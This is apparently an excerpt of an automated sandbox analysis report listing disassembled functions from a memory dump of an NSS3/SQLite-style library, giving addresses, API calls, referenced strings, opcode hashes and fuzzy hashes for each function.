API ID: CriticalEnterSectionUnlockValue$Alloc_ArenaUtilmemcmp
String ID:
API String ID: 115324291-0
Opcode ID: 19e00b6b67e9ecc2b62d47a9d0aa5488c3c98b6a0b8ac5e52c2fb3b3e31e9367
Instruction ID: dd61415912beb379bf1a44746fbcf707417f438458505262046e8e725fa20e24
Opcode Fuzzy Hash: 19e00b6b67e9ecc2b62d47a9d0aa5488c3c98b6a0b8ac5e52c2fb3b3e31e9367
Instruction Fuzzy Hash: CF02F2B1E002049FEB008F65DE69BAB77B9FF48318F140139E905A7B51E739E945CBA1

Function 6C6E0820 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 1448COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(00000000,00000001,00000001), ref: 6C6E11D2

Strings

not authorized, xrefs: 6C6E175E, 6C6E1763
rows deleted, xrefs: 6C6E17D2
authorizer malfunction, xrefs: 6C6E1BD2
@, xrefs: 6C6E0B17

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: memset
String ID: @$authorizer malfunction$not authorized$rows deleted
API String ID: 2221118986-4041583037
Opcode ID: 211a7371b691b4d3864f51806eb6ac04e4bb7e7b98088ba1108fa9ecb5770b7b
Instruction ID: 3684260a7b22386a798ef5bd89bd32649e31929f849f2e6acba9a4f327f72314
Opcode Fuzzy Hash: 211a7371b691b4d3864f51806eb6ac04e4bb7e7b98088ba1108fa9ecb5770b7b
Instruction Fuzzy Hash: A7D2AB70E09249CFDB14CFA9C480B9DBBF1BF49308F24816AD415ABB52D771E856DB84

Function 6C7AC9E0 Relevance: 7.7, APIs: 5, Instructions: 187timeCOMMON

Download Yara Rule

APIs

PR_NormalizeTime.NSS3(00000000,?), ref: 6C7ACEA5

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: NormalizeTime
String ID:
API String ID: 1467309002-0
Opcode ID: ac7e416af1e5fb126a361bff91f321036edca12d978397d55c55be814f8ab557
Instruction ID: 34a5b819aa0c1bd29444dfa6e01153eb155f665a69318420b2c03050c8f27ecc
Opcode Fuzzy Hash: ac7e416af1e5fb126a361bff91f321036edca12d978397d55c55be814f8ab557
Instruction Fuzzy Hash: D871B771A097018FC308CF69C54461ABBE5FF89314F248B2DE869C77A0E731D946CB95

Function 6C81CDC0 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 423stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C81D086
PR_Malloc.NSS3(00000001), ref: 6C81D0B9
PR_Free.NSS3(?), ref: 6C81D138

Strings

>, xrefs: 6C81CF5B

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: FreeMallocstrlen
String ID: >
API String ID: 1782319670-325317158
Opcode ID: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
Instruction ID: 13a0d4a1e6cfdbd721411b9d07651db0a325c49da596010c19560afa48b01692
Opcode Fuzzy Hash: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
Instruction Fuzzy Hash: 03D15C62B4D54B4FEB35487C8EA13DAB7D38742374F684B3AD5218BFE6E61988438341

Function 6C7BAD50 Relevance: 6.4, APIs: 4, Instructions: 389COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15268edb5095a25797b3540a90bb25094eddd61ed620695beeee187c3d8f6be5
Instruction ID: a4b781b6ad608a73758e7f269b655ac748fb904b528cfdb515152e46e4c9eae0
Opcode Fuzzy Hash: 15268edb5095a25797b3540a90bb25094eddd61ed620695beeee187c3d8f6be5
Instruction Fuzzy Hash: 1FF1E071E011168FEB64CF29CA907AA77B0BB8A30CF55423DD915E7740EBB8A945CBC1

Function 6C770E20 Relevance: 6.3, APIs: 2, Strings: 2, Instructions: 279COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,00000000,00000000,00000000), ref: 6C771052
memset.VCRUNTIME140(-0000001C,?,?,00000000), ref: 6C771086

Strings

h(wl, xrefs: 6C770E55, 6C770EC4, 6C770F3A, 6C770FA7
h(wl, xrefs: 6C771062, 6C77105D, 6C770F37, 6C771081, 6C771082

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: memcpymemset
String ID: h(wl$h(wl
API String ID: 1297977491-2771381319
Opcode ID: 6f1fabc555b331707e9ed5a9fc20e061d31c69321e9e3e13b0e849d3f054c8cb
Instruction ID: 65e7ae3893bd72b26defdd0560d98972bde0c0e819f1ae791ce694d4ef006eb1
Opcode Fuzzy Hash: 6f1fabc555b331707e9ed5a9fc20e061d31c69321e9e3e13b0e849d3f054c8cb
Instruction Fuzzy Hash: 50A13C71B0125E9FDF18CF99C994AEEB7B6BF89314B148129E905A7700D735EC11CBA0

Function 6C6E6900 Relevance: 6.3, Strings: 4, Instructions: 1257COMMON

Download Yara Rule

Strings

not authorized, xrefs: 6C6E78EC, 6C6E78F1
authorizer malfunction, xrefs: 6C6E7910
sqlite\_%, xrefs: 6C6E6953
BBB, xrefs: 6C6E7207, 6C6E780B

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: memcpystrlen
String ID: BBB$authorizer malfunction$not authorized$sqlite\_%
API String ID: 3412268980-2664116055
Opcode ID: 0faa0676fc8f29880c001e2dec784d5f67aed4484b35c7c89baaf6073c5a0087
Instruction ID: 817395b8a3998cb03ed582d27dd8f7ae26dd872e3af65577e91aa951bc98d679
Opcode Fuzzy Hash: 0faa0676fc8f29880c001e2dec784d5f67aed4484b35c7c89baaf6073c5a0087
Instruction Fuzzy Hash: F8C28070A05209DFCB14CF58C480AA9BBB2FF8D308F24816ED915AB756D736E956CF84

Function 6C696F10 Relevance: 5.2, Strings: 4, Instructions: 218COMMON

Download Yara Rule

Strings

sz=[0-9]*, xrefs: 6C697049
noskipscan*, xrefs: 6C697067
*?[, xrefs: 6C697034, 6C697052, 6C697070
unordered*, xrefs: 6C69702B

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID:
String ID: *?[$noskipscan*$sz=[0-9]*$unordered*
API String ID: 0-3485574213
Opcode ID: 909b8d4b99217c650901670be5702054ef703c272be4b2b1b052e80c2136504d
Instruction ID: a453264092c10c0c55b4eacab1cbf0cbadbfcfe86c208d029e9d8ef71a30a92d
Opcode Fuzzy Hash: 909b8d4b99217c650901670be5702054ef703c272be4b2b1b052e80c2136504d
Instruction Fuzzy Hash: B3718B72F042174BEB148E6DC8803DE73A39F85318F294239C959ABBD1D6719C46C7C9

Function 6C72EE70 Relevance: 3.2, APIs: 2, Instructions: 223COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C72F019
PK11_GenerateRandom.NSS3(?,00000000), ref: 6C72F0F9

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: ErrorGenerateK11_Random
String ID:
API String ID: 3009229198-0
Opcode ID: f28674b34aa5c963032b75bc96fe7a21ab5569db4e47a29f8ddf8cc7e5d013c4
Instruction ID: 9d4f4f22ab7c6869e5c78ffde2ec36101de8e4754b38b9c0ab9350ac5e91c9f2
Opcode Fuzzy Hash: f28674b34aa5c963032b75bc96fe7a21ab5569db4e47a29f8ddf8cc7e5d013c4
Instruction Fuzzy Hash: 92918E71E0062A8BCB14CF68C9916AEB7F1FF85324F24462DD962A7BC1D734A905CB61

Function 6C752F70 Relevance: 3.1, APIs: 2, Instructions: 149COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE09A,00000000,00000000,?,6C777929), ref: 6C752FAC
PR_SetError.NSS3(FFFFE040,00000000,00000000,?,6C777929), ref: 6C752FE0

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Error
String ID:
API String ID: 2619118453-0
Opcode ID: 7918d774f7ffb048e1c719eff0086c3fa879eddbebf82c0864ea8d41312550c2
Instruction ID: 69cade10a9bfeaa1887f986175cc9557b42edc487197aadc7e401bc3c7d018d9
Opcode Fuzzy Hash: 7918d774f7ffb048e1c719eff0086c3fa879eddbebf82c0864ea8d41312550c2
Instruction Fuzzy Hash: 52512571A04A158FD7108E55CB84B6A73B2FB40318FA94279D90D9BB22CF35E862CB90

Function 6C69AC60 Relevance: 2.7, Strings: 2, Instructions: 181COMMON

Download Yara Rule

Strings

winUnlock, xrefs: 6C69AE18
winUnlockReadLock, xrefs: 6C69AE9F

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID:
String ID: winUnlock$winUnlockReadLock
API String ID: 0-3432436631
Opcode ID: c5ef37e1a29e3bdb5820834266237ec9e6a973dd7dfe2273bab33ab39531fea2
Instruction ID: fd2a494eda0c87c5e88903445edb87bd2e87ea7d47a3e0ceb37b198bdbe7e72d
Opcode Fuzzy Hash: c5ef37e1a29e3bdb5820834266237ec9e6a973dd7dfe2273bab33ab39531fea2
Instruction Fuzzy Hash: 587191706083019FDB54CF28D894AABBBF5FF89318F14C629F98997242D734A985CBC1

Function 6C6C49F0 Relevance: 1.9, APIs: 1, Instructions: 673COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2023203c1f937b70617acb10a01091ee40f15fc1d4aa2235e45dd614c65b86f
Instruction ID: 60c24d933c0524b91261290c2777ece62ba5b3434c1e0809a02bfe9f5e257151
Opcode Fuzzy Hash: e2023203c1f937b70617acb10a01091ee40f15fc1d4aa2235e45dd614c65b86f
Instruction Fuzzy Hash: CE528974E002098FDB04CF59C480BAEBBF2FF89318F258259D814AB755D775E842CB99

Function 6C75ED70 Relevance: 1.7, APIs: 1, Instructions: 217memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(00000000,0000003C), ref: 6C75EE3D

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Alloc_ArenaUtil
String ID:
API String ID: 2062749931-0
Opcode ID: b51203e4b2318080346e191dc444ed80196527117a86a943b733acd6992df4c0
Instruction ID: 1717a678c4c46101321808d0a9c9e1a279c1c434ca58c45f6b143910b651e5cc
Opcode Fuzzy Hash: b51203e4b2318080346e191dc444ed80196527117a86a943b733acd6992df4c0
Instruction Fuzzy Hash: 2971F272E117098FE718CF19CA8066AB7F2EB88304F54462DD85697B91DF39E910CB90

Function 6C694DB0 Relevance: 1.6, Strings: 1, Instructions: 318COMMON

Download Yara Rule

Strings

winUnlockReadLock, xrefs: 6C695125

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID:
String ID: winUnlockReadLock
API String ID: 0-4244601998
Opcode ID: ebaa2e94088d78c8c80073dc0fdb097ced412401b0e2d28aaf53b5172db32116
Instruction ID: 826559f2a9d25413419ee12995902eb41e3c7a11193af4ccc0ae7207644daf12
Opcode Fuzzy Hash: ebaa2e94088d78c8c80073dc0fdb097ced412401b0e2d28aaf53b5172db32116
Instruction Fuzzy Hash: 1AE14A70A083418FDB54DF29D88466ABBF0FFCA308F51862DF89997251E7749985CBC2

Function 6C71A820 Relevance: 1.4, Strings: 1, Instructions: 169COMMON

Download Yara Rule

Strings

[[pl, xrefs: 6C71A943, 6C71A92D

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID:
String ID: [[pl
API String ID: 0-916111979
Opcode ID: 70c2a3bdd247855ff4dcc2f97d07f3873eded111804f63dbde847ea372f6ad6b
Instruction ID: 9bd9b83f0a7a4eb775d1ec8e836ee37c620f01bc2d49a7064542fad0541d1f3a
Opcode Fuzzy Hash: 70c2a3bdd247855ff4dcc2f97d07f3873eded111804f63dbde847ea372f6ad6b
Instruction Fuzzy Hash: 2A517F71A092098FDB05CF15DA44BAA7BE5EF49318F2A807DE8199BB50D730D899CF90

Function 6C6C8960 Relevance: .4, Instructions: 381COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 479b8d2f213f65b1b536ab0ea025c35109ca1eff46ca7d7c516c56307c097544
Instruction ID: 8fc2c5fb54cb4156b66913c435269444312d4acfbb7f754a3071b6ce48a36ce5
Opcode Fuzzy Hash: 479b8d2f213f65b1b536ab0ea025c35109ca1eff46ca7d7c516c56307c097544
Instruction Fuzzy Hash: D0D17171F052168FDB68CEA9C4806AFB7F2FB8D304F15852AC556E7660D730AC41CB9A

Function 6C7CDCD0 Relevance: .4, Instructions: 371COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83c65b7ca4f8bf9a2a7c430f11555ce316c27f9fa4e20194675d3d72cea7ae65
Instruction ID: 43133cb5014ca07440ca977e0e8e27a4ac72752b04fd630fb5eafcf2f53bb965
Opcode Fuzzy Hash: 83c65b7ca4f8bf9a2a7c430f11555ce316c27f9fa4e20194675d3d72cea7ae65
Instruction Fuzzy Hash: CFF16B71B012068FDB08CF19C994BAA77B2BF89318F294178D8599B741CB35ED42CBD6

Function 6C6F8EA0 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c804beb60f152f28dace6ad1841ca4e00470d3f5c7fbbae6553bd1ced87328c
Instruction ID: 6d01779a70063dd31bdc8cd446351add9e5bd9461fd1d0e177660f244c9b9ba6
Opcode Fuzzy Hash: 1c804beb60f152f28dace6ad1841ca4e00470d3f5c7fbbae6553bd1ced87328c
Instruction Fuzzy Hash: 6411E632A012158FE714CF16D88475AB366BF8735CF0442AAD4254FA61C379D887C7C9

Function 6C7D0C40 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8270500a4d13d0788092da27e000c401982113a0db392efca0c4a3888b01cffb
Instruction ID: 7611a9fb2afe6f60a53a9659bab54f9304f44d0e65880126670835a006925ae8
Opcode Fuzzy Hash: 8270500a4d13d0788092da27e000c401982113a0db392efca0c4a3888b01cffb
Instruction Fuzzy Hash: 4B11CE787043458FCB10DF28D8846AA7BA2FF85368F14807DD8198B701DB71E806CBA4

Function 6C7D0D60 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
Instruction ID: 46a34d47090a901f2c604abb865012d1dc264d9dca7e274dea12d43a830c5657
Opcode Fuzzy Hash: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
Instruction Fuzzy Hash: 16E0923A202054A7DB148E09D555AA97359DF81619FB6907FCC5D9FA01D733F8038781

Function 6C6FCC60 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

